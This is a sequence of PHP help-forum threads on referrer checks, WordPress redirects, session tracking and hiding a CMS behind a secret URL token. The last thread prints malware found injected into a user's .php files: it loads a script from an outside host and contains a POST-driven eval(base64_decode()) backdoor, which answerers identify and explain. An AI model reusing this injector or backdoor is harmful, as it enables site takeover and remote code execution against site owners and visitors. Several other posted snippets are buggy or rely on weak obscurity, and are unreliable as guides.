I'm owner of some web site with dozen of web pages. Pages were made by using PHP. Before some time I discovered that some guys by using Joomla CMS and wrapper menu option included starting (login page) there and on this way confused members and other visitors, especially because "window" of wrapper isn't enough big and some information on my page aren't visible. On this way visitors connect these pages with me and get bad feeling about whole my site. I contacted these guys but no answer, then I tried to solve it by using $_SERVER['HTTP_REFERER'] super variable but I didn't get right and working solution for this problem. Someone experienced similar problem? Thanks.
EDIT - This is the code
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
if ($HTTP_REFERRER) {
// check if the referrer is on your noentry list
// if so redirect it to another page
if ($HTTP_REFERRER == "www.mean.visitor.com") {
echo 'referer is' . $HTTP_REFERRER;
die;
} // shows the referrer and formats ur local harddrive echo "You came from $HTTP_REFERRER";
} else {
//everything is OK
}
from the code you posted the first problem i see it's on the first line:
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
should be
$HTTP_REFERRER=$_SERVER['HTTP_REFERER'];
Then in the second if you must insert the web addresses you want to block. so change
if ($HTTP_REFERRER == "www.mean.visitor.com")
with
if ($HTTP_REFERRER == "the address yo want to block")
And write die() instead of die.
has something changed?
Related
I am really a noob when it comes to PHP and I would like to ask for your help. I would like to create a 404.php for my Wordpress site that shows the 404 page in the appropriate language. The site is multilingual: Dutch and English. (I tried some plugins but they don't work with my current theme). I have done some research and found some bits and pieces and mastered a piece of php code that doesn't work. If you could be so kind to point me in the right direction, that would be great. This is what I came up with:
<?php
$incomingUrl = $_SERVER['REQUEST_URI'];
if($incomingUrl == 'damcms.com/en') {
wp_redirect(damcms.com/en/page-not-found-404);
exit;
} else {
wp_redirect(damcms.com/pagina-niet-gevonden-404);
exit;
}
?>
I don't get an error message, nothing is being shown. So I miss something, what?Thanks in advance.
Claudia
First, the reason nothing happens is here:
wp_redirect(damcms.com/en/page-not-found-404);
Any time you have a string in PHP it must be in quotes; otherwise PHP tries to interpret it as instructions (and damcms.com/en/page-not-found-404 is not a valid PHP instruction).
So this would work:
wp_redirect('damcms.com/en/page-not-found-404');
But there's a bigger issue: you don't want to just check if the URL is exactly damcms.com/en — you want to check if it starts with damcms.com/en.
So, perhaps this:
if(strpos($_SERVER['REQUEST_URI'], 'damcms.com/en') !== false)) {
wp_redirect('damcms.com/en/page-not-found-404');
} else {
wp_redirect('damcms.com/pagina-niet-gevonden-404');
}
exit;
But going one level deeper, even this is a little iffy. WordPress already has a 404.php template that shows for any 404 page. I strongly recommend editing that — and there do the if ... 'damcms.com/en' test and then perhaps just include a 404-en.php template. That way the existing 404 mechanism still works. With the setup you have, the visitor is being redirected to a 200 page, so to a search engine it will appear your site has no 404s at all and everything is valid content!
I do not care about people viewing my source code, however, I want Bots to avoid coming on to my site and getting through my security. I was hoping to disable page source viewing. To do this, I am using this code:
$url= $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$needle = "view-source:";
if (strpos($url,$needle)) { echo "You can not see me";}
else {
//The rest of my index page
}
The objective here is that if someone tries to view my page source or if a bot tries to, that rather than being able to see it, the code will detect that the page URL is view-source:www.yoururl.com and will display a "Nice try" message in the source instead of the page source. The code above in theory should have worked, but didn't. Any other idea's to try and make this work?
This cannot be done, the HTML source code is passed to whoever requests it. You should probably redesign your captcha, as it is not secure from how you described it. Use session variables to store the data and to check against the submitted value on the form processor script.
you could use mod_rewrite and a permanent 301 redirect in your .htaccess to hide the ?captcha=xxxx part of your url, if it is your sole concern.
I'm trying to get three things into a hidden form field in a Wordpress page:
The last "offsite" page visited before someone visited any page on my site (e.g., quite possibly a Google page)
The first page they visited on my site
The last page on my site before they went to the form page
The third one is easy (just use ), but the first two are giving me problems.
I'm trying to save #1 and #2 by using session variables, so that on every page, in the header, I have the following code:
<?php
session_start();
if (! isset($_SESSION['offsite_referer'])) {
$_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER'];
}
if (! isset($_SESSION['first_page'])) {
$_SESSION['first_page'] = $_SERVER['REQUEST_URI'];
}
?>
Then further down I have, as test code (to be changed to input type=hidden etc. later):
<p>offsite_referer: <?= $_SESSION['offsite_referer'] ?></p>
<p>first_page: <?= $_SESSION['first_page'] ?></p>
(FWIW, I also have session_start() at the top of my wp-config.php. Yes, my site has register_globals turned off.)
For some reason, $_SESSION['offsite_referer'] always ends up as my home page, even when I hit the form page (/free-reports) directly via link from another site. Similarly, first_page always shows up as /
Yes, I'm clearing all my cookies etc. between attempts, to force a new session to be created.
This code used to work fine on my pre-Wordpress site, so I can only think it has something to do with WP, specifically perhaps WP's redirection (WP's mod_rewrite stuff in .htaccess)
I tried changing $_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER'] to wp_get_original_referer() but it seemed to have no effect.
Incidentally, if I access my form page (at /free-reports/) as the first page on my site (after clearing cookies etc.) and printing $_SERVER['HTTP_REFERER'], it correctly shows the last offsite page - even though $_SESSION['offsite_referer'] doesn't.
I'm pretty perplexed, and have spent a fair amount of time trying to figure it out on my own, so any help to solve this would be appreciated.
Chances are, you can't really get the referer URL since some browsers don't send that and some people disable that, but here's how you could do that and I'll give you some extra tips here:
//first of all, initialize the session
session_start();
//Now call logvisit() to log where the user is coming from
logvisit();
function logvisit() {
$_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER']);
$browser = $_SERVER['HTTP_USER_AGENT']; //Gets the browser the user is using
//If you want to test it (disable the code below if you don't want to print that information):
echo "Offsite referer: $_SESSION['offsite_referer']<br>";
echo "Browser: $browser<br>";
}
Then to destroy the session you can use unset($_SESSION['offsite_referer']);
This is how I usually do it, and it's often a tidy way to do it.
I believe scunliffe had the key to this, as I was using IE to do the testing.
It works fine now, which I attribute to actually closing and restarting IE (apparently just deleting cookies doesn't do it, as you'd think, even though that works fine in Firefox).
I also changed what I was doing slightly to just save the full in-site browse history in a session variable, rather than only first and last page on the site.
The code I ended up with was the following, which is just at the top of my theme's header.php file:
<?php
session_start();
if (! isset($_SESSION['site_history'])) {
$_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER'];
$_SESSION['site_history'] = '';
}
$_SESSION['site_history'] .= ($_SERVER['REQUEST_URI'] . ';');
?>
I originally had session_start() also in wp-config.php when I was trying to figure this out, but was able to remove it (leaving just the above code in header.php) and things still work fine.
In case anyone finds this page wanting to do something similar, I was able to access this info in my WP page by adding the following to my theme's functions.php:
function get_offsite_referer() { return $_SESSION['offsite_referer']; }
add_shortcode('offsite-referer', 'get_offsite_referer');
function get_site_history() { return $_SESSION['site_history']; }
add_shortcode('site-history', 'get_site_history');
and then to pass the info on my Wordpress page/form:
<input type="hidden" name="offsite_referer" value="[offsite-referer]" />
<input type="hidden" name="site_history" value="[site-history]" />
scunliffe, if you'd posted your comment as a "reply" I would have "accepted" it, since it was what most closely led me in the right direction, but as a comment I could only upvote it so that's what I did. Thanks!
I am trying to hide my websites cms application...
So i thought i would add a bit of php to any random page on my site, that includes a GET referance to some random string... So basically, if you go to x page, and add ?RANDOMSTRING the cms index is included. This is stored above the web root... Here is the peice of php:
if (isset($_GET['J7sd-H3sc9-As3R']))
{
require_once($docRoot . '/../../includes/admin/index.php');
}
Basically, index.php is laid out as a page with 3 fieldsets. In the 3 field sets are various links relating to various applications that deal with various tasks. They were accessed through the same means as the above code. And they were held in the web root and were able to be accessed via http...
That all worked perfectly fine, But the problem now comes when i try to access any specific part of the cms...so what would have been:
http://www.mysite.com/admin/part/
is now:
include($_SERVER['DOCUMENT_ROOT'] . '/../../includes/admin/part/index.php');
Or something of the sort...
So now when i go to my page at
http://www.mysite.com/randomDirectory/
and add:
http://www.mysite.com/randomDirectory/?J7sd-H3sc9-As3R
I get sent to my cms... Cool... But when i try to click on any section i get this header:
http://www.mysite.com/randomDirectory/?part
and the page gets refreshed to:
http://www.mysite.com/randomDirectory/
If that makes sense...
Could any provide me with any input or suggestions regarding the task that i am trying to accomplish? I am not sure if it is even possible to start off with, but it seems simple enough.
Any replies would be greatly appreciated, Thanks!
I guess you should append at the end of every link in your page something like
<?php if (isset($_GET['J7sd-H3sc9-As3R'])) echo '?J7sd-H3sc9-As3R'; ?>
Example:
http://www.mysite.com/randomDirectory/randomPage<?php if (isset($_GET['J7sd-H3sc9-As3R'])) echo '?J7sd-H3sc9-As3R'; ?>
edit
An easier way to do this would be to use sessions, in this way:
<?php
session_start();
if (isset($_GET['J7sd-H3sc9-As3R']))
{
$_SESSION['token'] = 'J7sd-H3sc9-As3R';
}
if (!isset($_SESSION['token']) || $_SESSION['token'] !== 'J7sd-H3sc9-As3R')
{
exit;
}
// go on with your page
?>
In this way, when you open a page with your token in the url, the session is started and the token is saved in the session, so it should work without the need to insert the token in every url until you close your browser.
Can someone please advise what this php code will do? I have found this code on every .php pages only. Other pages like js / css / php.ini are fine. Is this malicious code? If yes, please suggest how to prevent the malicious activity.
Here is the Code:
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
I haven't examined it closely, but only the line
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
shows me already that it is, if not malicious, then very very close - there is code injection possible.
It's more likely it will redirect your every page to attacker website.
The # will halt any errors so you wont get any logs from this script.
You should remove it if you want your site to work properly.
EDIT: it doesn't redirect but it will inject anything it wants on your pages.
The second part of the script where it checks for cookies will add a javascript from his website and can do malicious things.
The last part I don't think anyone will be able to guess what is it because it relies on some post variable and that's $_POST['showimg'], I guess he attacked your website with POST.
Things to do: Change your passwords, check for write permissions on your files, they shouldn't be 0777, backup database and WordPress Template, delete WordPress install and re-install from scratch. In your template search for his code then add your cleaned template.
Your problem is not the code itself, it's how it got there in the first place. You need to check the write permissions on your files/folders to make sure no one from the outside can modify them.
You mentioned that you're using wordpress, please read this article about hardening wordpress security. I suggest that you lock down your blog (if it's feasible) until you fix your security issues.
im a security analyst and i believe it is redirecting you to a possible malicious website if and only if you do not have that cookie. if you already have that cookie then the script will know you have already been there and possibly researching the malware thus not executing the redirect. The image may be like a detect debugger preset API.. this is just my opinion.